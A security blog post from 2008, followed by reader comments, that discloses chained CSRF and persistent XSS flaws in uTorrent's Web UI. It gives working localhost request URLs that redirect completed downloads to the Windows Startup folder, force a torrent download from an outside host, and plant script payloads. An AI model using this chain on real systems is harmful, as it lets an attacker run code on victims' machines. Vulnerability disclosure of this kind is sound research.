Saturday, April 19, 2008

[ uTorrent Pwn3d ]

I was going to keep this under my hat, so to speak, but this has forced my hand.


I found a few CSRFs that when put together can make a pretty devastating attack against uTorrent's Web UI and the underlying system. Basically you can force uTorrent to move completed downloads to an arbitrary directory on their system, download arbitrary torrents, and completely pwn their box.

This guy from rooksecurity.com had a couple interesting CSRFs that will change the username and password required for the Web UI. But, in order for the attacker to change the username and password the user must already be authenticated...so why go to all that trouble? For this attack we're going to assume that the user is already authenticated to uTorrent's Web UI.

First of all you need a way to get a file on their computer. Not only that, but you want to be able to put that file in an arbitrary location of your choosing. To do that you need to turn on uTorrent's "Move completed downloads to" option.


Then you need to tell uTorrent what directory to move the completed file to.


The URL is cut off in the screenshot, so here's what's actually happening:

http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\
Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup

And this is what uTorrent's downloads preferences should now look like:


Completed files will be moved to the All Users Startup folder and once we can force them to download files we effectively have pwnage. I actually can force them to download a torrent by doing the following:

http://localhost:14774/gui/?action=add-url&s=http://www.whatever.com/file.torrent

Let's say that the torrent makes uTorrent download pwn.bat. Once the download finishes, pwn.bat resides in the Startup folder and gets executed when the user reboots. But wait, it gets worse...

uTorrent has an XSS in the Web UI! Remember my previous two posts about the dangers of local web servers? There are actually a few different spots to exploit this. Here are the PoC strings for the XSS vectors.

http://localhost:14774/gui/?action=setsetting&s=tracker_ip&
v=%3Cscript%3Ealert('xss')%3C/script%3E

http://localhost:14774/gui/?action=setsetting&s=ct_hist_comm&
v=%3Cscript%3Ealert('xss')%3C/script%3E

http://localhost:14774/gui/?action=setsetting&s=dir_active_download&
v=%3Cscript%3Ealert('xss')%3C/script%3E


These are ALL persistent XSS attacks. To make the malicious Javascript fire you need to force the user's browser to visit

http://localhost:14774/gui/?action=getsettings

Remember, the "localhost" portion is VERY important because you want to perform a Cross ZONE Scripting attack, not just XSS. You could use "loopback" in place of "localhost" as well. So, moving on...


If your target is using IE 6 then you don't have to force them to download a file to the Startup folder and wait for them to restart their box. All you have to do is force them to download the file to a location like C:\ and then execute it for them with the WScript.Shell ActiveXObject since your Javascript is in the Local Intranet zone.


Pwn3d. Stay tuned, more torrent pwnage to come soon...

Labels: , , , , , , , , ,

4 Comments:

At 12:48 PM, Anonymous Anonymous said...

Who will be so much crazy and let the webaccess to the computer open for all incomming IP's on http port by router?
Limit access to dyndns to the webui in your router Inbound to the pc. normaly its under Virtual Server Managment. Add rules for allowed webui access IP's. Otherwise you can post all possible java test in every website post fields.

 
At 1:28 PM, Blogger Rob said...

The attacker doesn't need direct access to the victim's uTorrent web UI. That's what makes this attack different. It uses CSRF, a client-side attack. The victim browses (or is redirected) to a malicious site that causes the victim's *own* browser to make a request to their machine that is running the uTorrent web UI. No need to mess with the router configs because the router isn't involved with HTTP requests to localhost.

 
At 4:54 AM, Anonymous Anonymous said...

Does this mean that if uTorrent's web UI is disabled in Preferences, this attack won't work?

 
At 5:00 PM, Blogger Rob said...

That is correct, Zhang. Although, I got some weirdness when I tried to access the Web UI after I disabled it.

http://bp2.blogger.com/_E_3RnfZAsxE/SFwnz7Pl__I/AAAAAAAAAM0/JfX5tV2lMac/s200/utorrent_weird.png

 

Post a Comment

<< Home